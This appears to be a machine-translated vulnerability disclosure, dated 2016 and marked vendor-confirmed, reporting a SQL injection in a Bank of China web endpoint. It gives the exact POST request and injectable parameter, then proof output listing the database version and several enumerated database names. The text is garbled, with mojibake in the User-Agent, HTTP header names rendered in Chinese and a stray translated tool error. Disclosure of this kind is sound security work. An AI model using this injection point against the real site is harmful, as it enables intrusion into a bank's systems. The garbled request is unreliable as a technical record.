漏洞标题 MySQL注入中国银行站（支持多种查询方式） 相关制造商 中国银行 漏洞作者 Aasron 提交时间 2016-05-05 11: 06 公共时间 2016-06-19 22: 10 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Php +字符型注入，注入技术，Mysql 漏洞详细信息 回顾一下，注入点不一样 POST /interFace/getAppUpdate.php HTTP/1.1 主机: open.boc.cn 用户代理:eç¤3/4å? o？?æ?·é? 1.0.8（iPhone; iPhone OS 9.3.1; zh_CN） 内容长度: 25 连接:关闭 Accept-Encoding: gzip { 'clientkey':'254' } 第一次注入是PUT提交方法，这是正常的POST提交。 目前的数据库已经给出 漏洞证明： 8个领域 数据库版本为: 5.5.30-ndb-7.2.12-cluster-commercial-advanced-log 直接给出结果，手册真的很累 可用数据库[11]: [*] bim [*] 容器 [*] ec 从对等方接收数据时失败